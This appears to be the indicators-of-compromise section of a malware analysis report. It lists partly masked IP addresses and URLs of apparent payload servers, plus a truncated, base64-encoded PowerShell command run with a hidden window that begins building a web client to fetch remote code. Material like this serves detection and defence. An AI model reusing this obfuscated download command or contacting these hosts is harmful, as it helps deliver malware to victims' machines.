Technical Information
- '17#.#2.233.192':80
- '15#.#5.146.232':80
- '15#.#5.65.213':80
- '35.#04.88.6':80
- '10#.#4.104.187':80
- http://17#.#2.233.192/e4JNZZJgLi
- http://15#.#5.65.213/7GTEoQPlnk
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JABaAF8AXwA3ADQAMgBfADUAPQAoACcAQwA3ACcAKwAnAF8AXwA1ADMAJwApADsAJABGADQAXwA4ADIANAAzAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGYANgA4AF8ANgA5AD0AKAAnAGgAd...' (with hidden window)